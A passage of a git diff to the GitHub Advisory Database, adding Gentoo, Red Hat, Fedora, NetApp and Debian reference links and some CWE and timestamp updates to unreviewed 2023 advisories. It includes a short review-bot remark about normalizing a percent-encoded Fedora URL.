"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/3" diff --git a/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json b/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json index a702f70db3f83..6a97e1204ebec 100644 --- a/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json +++ b/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" 
diff --git a/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json b/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json index 7bda633f43130..f4e4fabfd069d 100644 --- a/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json +++ b/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json b/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json index 312c2289182c8..8e189e113f3f8 100644 --- a/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json +++ b/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json b/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json index e862b401016ba..0b1aed506dfab 100644 --- a/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json +++ b/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json @@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5551" 
diff --git a/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json b/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json index efc4204a2b5dd..2520ac0433a62 100644 --- a/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json +++ b/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json b/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json index 78145922f09dc..fa20f04f1b831 100644 --- a/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json +++ b/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json b/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json index 5ccc6ade19940..19cd64c8ff680 100644 --- a/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json +++ b/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" 
diff --git a/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json b/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json index 87920cdab7e73..ea0c00574ae18 100644 --- a/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json +++ b/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json b/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json index c4072c1f062dd..9e8a62f0801f3 100644 --- a/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json +++ b/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json @@ -29,6 +29,14 @@ "type": "WEB", "url": "https://kernel.dance/93995bf4af2c5a99e2a87f0cd5ce547d31eb7630" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3OXWBKK7RTQOGGDLQGCZFS753VLGS2GD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3S55P23EYAWDHXZPJEVTGIRZZRICYI3Z/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IG6IF3FUY7LVZJMFRPANAU4L4PSJ3ESQ/" diff --git a/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json b/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json index 415d0de2533e0..ce78247c6f280 100644 --- a/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json 
+++ b/advisories/unreviewed/2023/11/GHSA-xm5p-7w7v-qqr5/GHSA-xm5p-7w7v-qqr5.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json b/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json index b1c53cdda4c25..2e83dce3496b6 100644 --- a/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json +++ b/advisories/unreviewed/2023/11/GHSA-xmhq-fw78-wjxr/GHSA-xmhq-fw78-wjxr.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json index d5b19ff8d3cfc..7eb9682fcabe4 100644 --- a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json +++ b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json @@ -85,6 +85,14 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0554" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0575" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-5178" diff --git a/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json b/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json index 0f60c8046f781..c79b8b08c8b8a 100644 
--- a/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json +++ b/advisories/unreviewed/2023/11/GHSA-xx79-4755-jq22/GHSA-xx79-4755-jq22.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://gitlab.com/wireshark/wireshark/-/issues/19369" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-09" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5559" diff --git a/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json b/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json index 3222426a21be0..ce47e7b49306b 100644 --- a/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json +++ b/advisories/unreviewed/2023/12/GHSA-3pr6-6r34-c98x/GHSA-3pr6-6r34-c98x.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json b/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json index e6c55c2ffeaf9..85722bca0592e 100644 --- a/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json +++ b/advisories/unreviewed/2023/12/GHSA-4m6w-vxqg-9rmm/GHSA-4m6w-vxqg-9rmm.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6606" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-6606" 
diff --git a/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json b/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json index 79a613cf4fab9..ed90d860da6cb 100644 --- a/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json +++ b/advisories/unreviewed/2023/12/GHSA-587x-fmc5-99p9/GHSA-587x-fmc5-99p9.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json b/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json index 6948ae974a4d0..eddec106a992f 100644 --- a/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json +++ b/advisories/unreviewed/2023/12/GHSA-62rj-gv2c-8ghr/GHSA-62rj-gv2c-8ghr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-62rj-gv2c-8ghr", - "modified": "2024-01-03T18:30:50Z", + "modified": "2024-02-08T12:30:48Z", "published": "2023-12-22T18:30:30Z", "aliases": [ "CVE-2023-42465" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202401-29" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0002/" + }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2023/12/21/9" diff --git a/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json b/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json index 0095b18841ba3..eff38a860cd71 100644 --- a/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json +++ b/advisories/unreviewed/2023/12/GHSA-68mg-jchw-j7f7/GHSA-68mg-jchw-j7f7.json 
@@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38174" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json b/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json index 40a4dd65caff3..663d1ec7484a4 100644 --- a/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json +++ b/advisories/unreviewed/2023/12/GHSA-7c6v-f3h8-2x89/GHSA-7c6v-f3h8-2x89.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6JL4VHZMHFGEGQYTF74533ZNRWMCMMR/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5585" diff --git a/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json b/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json index f71f3bd05c4a8..70497015b8883 100644 --- a/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json +++ b/advisories/unreviewed/2023/12/GHSA-7hjc-c62g-4w73/GHSA-7hjc-c62g-4w73.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json b/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json index 38d96528ef242..952975f758eda 100644 --- a/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json +++ b/advisories/unreviewed/2023/12/GHSA-7mp8-w7v3-999f/GHSA-7mp8-w7v3-999f.json 
@@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json b/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json index f97e510ac1a10..0c1f3cc9bf88c 100644 --- a/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json +++ b/advisories/unreviewed/2023/12/GHSA-8776-q38g-hwjm/GHSA-8776-q38g-hwjm.json @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json b/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json index 785f6d69804a8..f24c7d7e8d457 100644 --- a/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json +++ b/advisories/unreviewed/2023/12/GHSA-8jgg-mv8q-h7xh/GHSA-8jgg-mv8q-h7xh.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json b/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json index 571bd292120d8..3df3df243c107 100644 --- a/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json +++ b/advisories/unreviewed/2023/12/GHSA-8mrc-5phh-m9pc/GHSA-8mrc-5phh-m9pc.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8mrc-5phh-m9pc", - "modified": "2023-12-24T00:30:29Z", + "modified": "2024-02-08T12:30:48Z", "published": "2023-12-24T00:30:29Z", "aliases": [ "CVE-2023-7090" @@ -29,6 +29,14 @@ "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255723" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0001/" + }, { "type": "WEB", "url": "https://www.sudo.ws/releases/legacy/#1.8.28" diff --git a/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json b/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json index 6397ddc1350ee..0746e1cd34884 100644 --- a/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json +++ b/advisories/unreviewed/2023/12/GHSA-8p5h-3mcg-frjf/GHSA-8p5h-3mcg-frjf.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50495" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/" + }, { "type": "WEB", "url": "https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00020.html" diff --git a/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json b/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json index ad0f01b6ec14b..3e92ffda5bdb4 100644 --- a/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json +++ b/advisories/unreviewed/2023/12/GHSA-94j3-598h-qmfw/GHSA-94j3-598h-qmfw.json 
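Review bot: The Fedora reference added to GHSA-8p5h-3mcg-frjf percent-encodes the mailbox separator (`package-announce%40lists.fedoraproject.org`), while every other Fedora announce URL in this batch uses a literal `@` (for example the GNXKVR5Y… entry added to GHSA-jvj3-gqjm-cg8p). Tools that deduplicate or cross-match advisory references by exact URL string will treat the two spellings as different links, so the database ends up carrying the same host path in two forms. Unless the upstream CVE record is deliberately mirrored byte-for-byte, normalize it to `"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LU4MYMKFEZQ5VSCVLRIZGDQOUW3T44GT/"`. If the sync pipeline copies the NVD reference list verbatim, a URL-normalization step on ingest would keep this from recurring.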
@@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json b/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json index 5f5268b618533..51ec54955dc6b 100644 --- a/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json +++ b/advisories/unreviewed/2023/12/GHSA-96fh-9q43-rmjh/GHSA-96fh-9q43-rmjh.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249523" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNEEWAACXQCEEAKSG7XX2D5YDRWLCIZJ/" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json b/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json index 1a43d5b2a2535..b79e3f48587c6 100644 --- a/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json +++ b/advisories/unreviewed/2023/12/GHSA-9v72-359m-2vx4/GHSA-9v72-359m-2vx4.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json b/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json index a90b25f20aefd..ec753b62ff3c3 100644 --- a/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json 
+++ b/advisories/unreviewed/2023/12/GHSA-9vh7-c87x-8q9v/GHSA-9vh7-c87x-8q9v.json @@ -41,6 +41,14 @@ "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253986" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/" + }, { "type": "WEB", "url": "https://lore.kernel.org/netdev/20231211083758.1082853-1-jiri@resnulli.us/" diff --git a/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json b/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json index 3a4d9a4f17778..f1e95d4c5a4b6 100644 --- a/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json +++ b/advisories/unreviewed/2023/12/GHSA-fwrj-5c8f-f8h2/GHSA-fwrj-5c8f-f8h2.json @@ -97,6 +97,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-December/003435.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240125-0003/" diff --git a/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json b/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json index 4acc3b0971948..bf797158a404f 100644 --- a/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json +++ b/advisories/unreviewed/2023/12/GHSA-g7qw-4p9h-v9vx/GHSA-g7qw-4p9h-v9vx.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-20", "CWE-79" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json b/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json index 1f002f6d1925c..a4be472d39217 100644 
--- a/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json +++ b/advisories/unreviewed/2023/12/GHSA-ggw2-384r-h3r8/GHSA-ggw2-384r-h3r8.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RI3UHCTFH6KWAJGDZ2TOLT6VHKW53WCC/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5573" diff --git a/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json b/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json index 897565202cf14..836ec15bfd036 100644 --- a/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json +++ b/advisories/unreviewed/2023/12/GHSA-h27f-fw5q-c2gh/GHSA-h27f-fw5q-c2gh.json @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6NWZ23ZJ62XKWVNGHSIZQYILVJWH5BLI/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json b/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json index 316a87b08669c..cf0c3575d2dac 100644 --- a/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json +++ b/advisories/unreviewed/2023/12/GHSA-h9fx-g2cp-w46c/GHSA-h9fx-g2cp-w46c.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35618" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json b/advisories/unreviewed/2023/12/GHSA-j5jm-hg4x-w8rx/GHSA-j5jm-hg4x-w8rx.json index 2279296a34802..b5fa2b1c9dd7c 100644 
